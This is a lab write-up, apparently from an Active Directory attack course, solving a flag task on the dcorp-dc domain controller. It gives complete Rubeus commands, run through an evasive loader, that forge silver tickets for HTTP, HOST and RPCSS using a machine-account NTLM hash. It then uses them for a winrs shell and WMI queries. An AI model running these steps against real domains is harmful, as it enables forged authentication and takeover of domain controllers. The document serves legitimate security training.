Tasks
1 - Try to get command execution on the domain controller by creating silver ticket for:
Flag 18 [dcorp-dc] - The service whose Silver Ticket can be used for winrs or PowerShell Remoting 🚩
Solutions
1 - Try to get command execution on the domain controller by creating silver ticket for:
From the previous task we already have the NTLM hash of the domain controller's machine account (dcorp-dc$):
RID : 000003e8 (1000)
User : DCORP-DC$
LM :
NTLM : e4ce16e20da2e11d2901e0fb8a4f28b0
HTTP
We can create a Silver Ticket that gives us access to the HTTP service (WinRM) on the DC. The /rc4 value is the dcorp-dc$ hash above, /sid is the domain SID, /user is the identity the forged PAC will claim, and /ptt injects the ticket into the current logon session:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:e4ce16e20da2e11d2901e0fb8a4f28b0 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
We can check that we got the correct service ticket by running klist, either the built-in one or Rubeus' klist action (both list the current session's ticket cache):
klist
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args klist
In the output we can see the ticket:
http/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
Let's try accessing the DC using winrs. Note that we use the FQDN of dcorp-dc, because that is the name in the service ticket's SPN (http/dcorp-dc.dollarcorp.moneycorp.local); the short name would not match the cached ticket and Windows would request a legitimate ticket as the current user instead:
winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd
In the remote shell, confirm which user and which machine we are running as:
set username
set computername
WMI
For accessing WMI we need to create two tickets: one for the HOST service and one for RPCSS, because WMI over DCOM authenticates to both. Run the following commands from an elevated shell, using the same dcorp-dc$ hash as above (the hash must be the target machine account's hash, and it is the same account for every service on dcorp-dc):
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:e4ce16e20da2e11d2901e0fb8a4f28b0 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /rc4:e4ce16e20da2e11d2901e0fb8a4f28b0 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
Verify with klist that both tickets (host/ and rpcss/ for dcorp-dc.dollarcorp.moneycorp.local) are present, then try WMI commands on the domain controller. Start a PowerShell session through InviShell and run the WMI query from it:
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc
If the short name does not match the cached tickets, use the FQDN they were forged for (dcorp-dc.dollarcorp.moneycorp.local), exactly as with winrs.
Flag 18 [dcorp-dc] - The service whose Silver Ticket can be used for winrs or PowerShell Remoting 🚩
As we can see in the previous task, the XXXX service can be used for winrs or PowerShell Remoting.